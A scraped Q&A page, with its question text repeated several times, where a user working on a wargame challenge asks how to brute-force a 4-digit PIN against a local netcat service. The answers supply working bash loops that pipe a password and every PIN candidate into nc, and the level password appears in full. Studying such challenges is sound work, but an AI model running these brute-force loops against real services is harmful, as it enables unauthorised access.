Brute-force 4 digit pin with pass using shell script












-2















I am doing some challenges. This is one them. I am trying to brute-force 4 digit pin with the password to get my desired answer. After connecting to the port It prompts me to enter the password then space then 4 digit pin. I tried to brute-force the pin using the script:



 #!/bin/bash 
nc localhost 30002
sleep 2

for i in {0000..9999};
if [[ $(echo 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i' </dev/stdin) = ^Wrong*]];
then
continue
echo '[+] Pincode Cracked! Pincode = $i'
fi
done


but it seems that this doesn't input the pass and pin to stdin, before i tried doing something like this -> if [[ $(echo 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i') = ^Wrong* ]]; What am I doing wrong here?



UPDATE:



Okay, so after researching around. I wrote this:



for i in {0000..9999}
do
if [ (echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" | nc localhost 30002 | grep -o Wrong) == "Wrong" ]
then
sleep 0.1
continue
fi
echo "- - - - - - - - - - - - - - - - - - - - - - - - [$i]"
done



This might even work but as you can see it opens new connections in the loop which makes it really slow and exhaust the system.










share|improve this question

























  • You're missing a do in your for loop. $i is in single quotes in both places so it wont be expanded. You need a space after ^Wrong* and before ]]. continue will cause it to skip echo '[+] Pincode Cracked! Pincode = $i' every time.

    – Jesse_b
    Mar 22 '18 at 21:56






  • 3





    Put your code into shellcheck.net When you have fixed the obvious syntax errors that will make it refuse to run come back (with corrected code) and ask the specific question(s) that you still need answering.

    – roaima
    Mar 22 '18 at 23:36
















-2















I am doing some challenges. This is one them. I am trying to brute-force 4 digit pin with the password to get my desired answer. After connecting to the port It prompts me to enter the password then space then 4 digit pin. I tried to brute-force the pin using the script:



 #!/bin/bash 
nc localhost 30002
sleep 2

for i in {0000..9999};
if [[ $(echo 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i' </dev/stdin) = ^Wrong*]];
then
continue
echo '[+] Pincode Cracked! Pincode = $i'
fi
done


but it seems that this doesn't input the pass and pin to stdin, before i tried doing something like this -> if [[ $(echo 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i') = ^Wrong* ]]; What am I doing wrong here?



UPDATE:



Okay, so after researching around. I wrote this:



for i in {0000..9999}
do
if [ (echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" | nc localhost 30002 | grep -o Wrong) == "Wrong" ]
then
sleep 0.1
continue
fi
echo "- - - - - - - - - - - - - - - - - - - - - - - - [$i]"
done



This might even work but as you can see it opens new connections in the loop which makes it really slow and exhaust the system.










share|improve this question

























  • You're missing a do in your for loop. $i is in single quotes in both places so it wont be expanded. You need a space after ^Wrong* and before ]]. continue will cause it to skip echo '[+] Pincode Cracked! Pincode = $i' every time.

    – Jesse_b
    Mar 22 '18 at 21:56






  • 3





    Put your code into shellcheck.net When you have fixed the obvious syntax errors that will make it refuse to run come back (with corrected code) and ask the specific question(s) that you still need answering.

    – roaima
    Mar 22 '18 at 23:36














-2












-2








-2








I am doing some challenges. This is one them. I am trying to brute-force 4 digit pin with the password to get my desired answer. After connecting to the port It prompts me to enter the password then space then 4 digit pin. I tried to brute-force the pin using the script:



 #!/bin/bash 
nc localhost 30002
sleep 2

for i in {0000..9999};
if [[ $(echo 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i' </dev/stdin) = ^Wrong*]];
then
continue
echo '[+] Pincode Cracked! Pincode = $i'
fi
done


but it seems that this doesn't input the pass and pin to stdin, before i tried doing something like this -> if [[ $(echo 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i') = ^Wrong* ]]; What am I doing wrong here?



UPDATE:



Okay, so after researching around. I wrote this:



for i in {0000..9999}
do
if [ (echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" | nc localhost 30002 | grep -o Wrong) == "Wrong" ]
then
sleep 0.1
continue
fi
echo "- - - - - - - - - - - - - - - - - - - - - - - - [$i]"
done



This might even work but as you can see it opens new connections in the loop which makes it really slow and exhaust the system.










share|improve this question
















I am doing some challenges. This is one them. I am trying to brute-force 4 digit pin with the password to get my desired answer. After connecting to the port It prompts me to enter the password then space then 4 digit pin. I tried to brute-force the pin using the script:



 #!/bin/bash 
nc localhost 30002
sleep 2

for i in {0000..9999};
if [[ $(echo 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i' </dev/stdin) = ^Wrong*]];
then
continue
echo '[+] Pincode Cracked! Pincode = $i'
fi
done


but it seems that this doesn't input the pass and pin to stdin, before i tried doing something like this -> if [[ $(echo 'UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i') = ^Wrong* ]]; What am I doing wrong here?



UPDATE:



Okay, so after researching around. I wrote this:



for i in {0000..9999}
do
if [ (echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" | nc localhost 30002 | grep -o Wrong) == "Wrong" ]
then
sleep 0.1
continue
fi
echo "- - - - - - - - - - - - - - - - - - - - - - - - [$i]"
done



This might even work but as you can see it opens new connections in the loop which makes it really slow and exhaust the system.







bash shell-script command-line nc






share|improve this question















share|improve this question













share|improve this question




share|improve this question








edited Jan 11 at 11:29









Kusalananda

124k16234385




124k16234385










asked Mar 22 '18 at 19:13









Srijan SinghSrijan Singh

44




44













  • You're missing a do in your for loop. $i is in single quotes in both places so it wont be expanded. You need a space after ^Wrong* and before ]]. continue will cause it to skip echo '[+] Pincode Cracked! Pincode = $i' every time.

    – Jesse_b
    Mar 22 '18 at 21:56






  • 3





    Put your code into shellcheck.net When you have fixed the obvious syntax errors that will make it refuse to run come back (with corrected code) and ask the specific question(s) that you still need answering.

    – roaima
    Mar 22 '18 at 23:36



















  • You're missing a do in your for loop. $i is in single quotes in both places so it wont be expanded. You need a space after ^Wrong* and before ]]. continue will cause it to skip echo '[+] Pincode Cracked! Pincode = $i' every time.

    – Jesse_b
    Mar 22 '18 at 21:56






  • 3





    Put your code into shellcheck.net When you have fixed the obvious syntax errors that will make it refuse to run come back (with corrected code) and ask the specific question(s) that you still need answering.

    – roaima
    Mar 22 '18 at 23:36

















You're missing a do in your for loop. $i is in single quotes in both places so it wont be expanded. You need a space after ^Wrong* and before ]]. continue will cause it to skip echo '[+] Pincode Cracked! Pincode = $i' every time.

– Jesse_b
Mar 22 '18 at 21:56





You're missing a do in your for loop. $i is in single quotes in both places so it wont be expanded. You need a space after ^Wrong* and before ]]. continue will cause it to skip echo '[+] Pincode Cracked! Pincode = $i' every time.

– Jesse_b
Mar 22 '18 at 21:56




3




3





Put your code into shellcheck.net When you have fixed the obvious syntax errors that will make it refuse to run come back (with corrected code) and ask the specific question(s) that you still need answering.

– roaima
Mar 22 '18 at 23:36





Put your code into shellcheck.net When you have fixed the obvious syntax errors that will make it refuse to run come back (with corrected code) and ask the specific question(s) that you still need answering.

– roaima
Mar 22 '18 at 23:36










3 Answers
3






active

oldest

votes


















0














That's because you're not telling your script to write anything to nc's standard input. Your script starts netcat, waits for it to terminate, and then sleeps for two seconds before executing the for loop. You probably want a construct such as:



for i in {0000..9999}; do
: stuff
done | nc localhost 30002





share|improve this answer































    0














    Here a working answere that is fast and working:



    #!/bin/bash
    passwd24=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
    for i in {0000..9999}; do
    echo "$passwd24 $i"
    done | nc localhost 30002 | grep -v Wrong | grep -v "I am the pincode checker for user bandit25"


    Your updated answer is very slow. The connections will live when a wrong answer is filled in. Like a earlier answer showed, is a pipeline at the end of the for-loop. If you really wanne know the correct pin you can add a line before the echo that echo "the correct pass: $1" > /tmp/correctpin.txt. This is not relevant for the purpose of receiving the correct passwd.






    share|improve this answer































      -1














      for i in {0000..9999}; do echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" | nc localhost 30002; done





      share|improve this answer

























        Your Answer








        StackExchange.ready(function() {
        var channelOptions = {
        tags: "".split(" "),
        id: "106"
        };
        initTagRenderer("".split(" "), "".split(" "), channelOptions);

        StackExchange.using("externalEditor", function() {
        // Have to fire editor after snippets, if snippets enabled
        if (StackExchange.settings.snippets.snippetsEnabled) {
        StackExchange.using("snippets", function() {
        createEditor();
        });
        }
        else {
        createEditor();
        }
        });

        function createEditor() {
        StackExchange.prepareEditor({
        heartbeatType: 'answer',
        autoActivateHeartbeat: false,
        convertImagesToLinks: false,
        noModals: true,
        showLowRepImageUploadWarning: true,
        reputationToPostImages: null,
        bindNavPrevention: true,
        postfix: "",
        imageUploader: {
        brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
        contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
        allowUrls: true
        },
        onDemand: true,
        discardSelector: ".discard-answer"
        ,immediatelyShowMarkdownHelp:true
        });


        }
        });














        draft saved

        draft discarded


















        StackExchange.ready(
        function () {
        StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2funix.stackexchange.com%2fquestions%2f432904%2fbrute-force-4-digit-pin-with-pass-using-shell-script%23new-answer', 'question_page');
        }
        );

        Post as a guest















        Required, but never shown

























        3 Answers
        3






        active

        oldest

        votes








        3 Answers
        3






        active

        oldest

        votes









        active

        oldest

        votes






        active

        oldest

        votes









        0














        That's because you're not telling your script to write anything to nc's standard input. Your script starts netcat, waits for it to terminate, and then sleeps for two seconds before executing the for loop. You probably want a construct such as:



        for i in {0000..9999}; do
        : stuff
        done | nc localhost 30002





        share|improve this answer




























          0














          That's because you're not telling your script to write anything to nc's standard input. Your script starts netcat, waits for it to terminate, and then sleeps for two seconds before executing the for loop. You probably want a construct such as:



          for i in {0000..9999}; do
          : stuff
          done | nc localhost 30002





          share|improve this answer


























            0












            0








            0







            That's because you're not telling your script to write anything to nc's standard input. Your script starts netcat, waits for it to terminate, and then sleeps for two seconds before executing the for loop. You probably want a construct such as:



            for i in {0000..9999}; do
            : stuff
            done | nc localhost 30002





            share|improve this answer













            That's because you're not telling your script to write anything to nc's standard input. Your script starts netcat, waits for it to terminate, and then sleeps for two seconds before executing the for loop. You probably want a construct such as:



            for i in {0000..9999}; do
            : stuff
            done | nc localhost 30002






            share|improve this answer












            share|improve this answer



            share|improve this answer










            answered Mar 22 '18 at 21:52









            DopeGhotiDopeGhoti

            43.9k55382




            43.9k55382

























                0














                Here a working answere that is fast and working:



                #!/bin/bash
                passwd24=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
                for i in {0000..9999}; do
                echo "$passwd24 $i"
                done | nc localhost 30002 | grep -v Wrong | grep -v "I am the pincode checker for user bandit25"


                Your updated answer is very slow. The connections will live when a wrong answer is filled in. Like a earlier answer showed, is a pipeline at the end of the for-loop. If you really wanne know the correct pin you can add a line before the echo that echo "the correct pass: $1" > /tmp/correctpin.txt. This is not relevant for the purpose of receiving the correct passwd.






                share|improve this answer




























                  0














                  Here a working answere that is fast and working:



                  #!/bin/bash
                  passwd24=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
                  for i in {0000..9999}; do
                  echo "$passwd24 $i"
                  done | nc localhost 30002 | grep -v Wrong | grep -v "I am the pincode checker for user bandit25"


                  Your updated answer is very slow. The connections will live when a wrong answer is filled in. Like a earlier answer showed, is a pipeline at the end of the for-loop. If you really wanne know the correct pin you can add a line before the echo that echo "the correct pass: $1" > /tmp/correctpin.txt. This is not relevant for the purpose of receiving the correct passwd.






                  share|improve this answer


























                    0












                    0








                    0







                    Here a working answere that is fast and working:



                    #!/bin/bash
                    passwd24=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
                    for i in {0000..9999}; do
                    echo "$passwd24 $i"
                    done | nc localhost 30002 | grep -v Wrong | grep -v "I am the pincode checker for user bandit25"


                    Your updated answer is very slow. The connections will live when a wrong answer is filled in. Like a earlier answer showed, is a pipeline at the end of the for-loop. If you really wanne know the correct pin you can add a line before the echo that echo "the correct pass: $1" > /tmp/correctpin.txt. This is not relevant for the purpose of receiving the correct passwd.






                    share|improve this answer













                    Here a working answere that is fast and working:



                    #!/bin/bash
                    passwd24=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
                    for i in {0000..9999}; do
                    echo "$passwd24 $i"
                    done | nc localhost 30002 | grep -v Wrong | grep -v "I am the pincode checker for user bandit25"


                    Your updated answer is very slow. The connections will live when a wrong answer is filled in. Like a earlier answer showed, is a pipeline at the end of the for-loop. If you really wanne know the correct pin you can add a line before the echo that echo "the correct pass: $1" > /tmp/correctpin.txt. This is not relevant for the purpose of receiving the correct passwd.







                    share|improve this answer












                    share|improve this answer



                    share|improve this answer










                    answered Nov 30 '18 at 21:09









                    Martijn van WezelMartijn van Wezel

                    1012




                    1012























                        -1














                        for i in {0000..9999}; do echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" | nc localhost 30002; done





                        share|improve this answer






























                          -1














                          for i in {0000..9999}; do echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" | nc localhost 30002; done





                          share|improve this answer




























                            -1












                            -1








                            -1







                            for i in {0000..9999}; do echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" | nc localhost 30002; done





                            share|improve this answer















                            for i in {0000..9999}; do echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" | nc localhost 30002; done






                            share|improve this answer














                            share|improve this answer



                            share|improve this answer








                            edited May 1 '18 at 10:09









                            Romeo Ninov

                            5,65831928




                            5,65831928










                            answered May 1 '18 at 8:48









                            Hike NalbandyanHike Nalbandyan

                            1012




                            1012






























                                draft saved

                                draft discarded




















































                                Thanks for contributing an answer to Unix & Linux Stack Exchange!


                                • Please be sure to answer the question. Provide details and share your research!

                                But avoid



                                • Asking for help, clarification, or responding to other answers.

                                • Making statements based on opinion; back them up with references or personal experience.


                                To learn more, see our tips on writing great answers.




                                draft saved


                                draft discarded














                                StackExchange.ready(
                                function () {
                                StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2funix.stackexchange.com%2fquestions%2f432904%2fbrute-force-4-digit-pin-with-pass-using-shell-script%23new-answer', 'question_page');
                                }
                                );

                                Post as a guest















                                Required, but never shown





















































                                Required, but never shown














                                Required, but never shown












                                Required, but never shown







                                Required, but never shown

































                                Required, but never shown














                                Required, but never shown












                                Required, but never shown







                                Required, but never shown







                                Popular posts from this blog

                                How to make a Squid Proxy server?

                                Is this a new Fibonacci Identity?

                                19世紀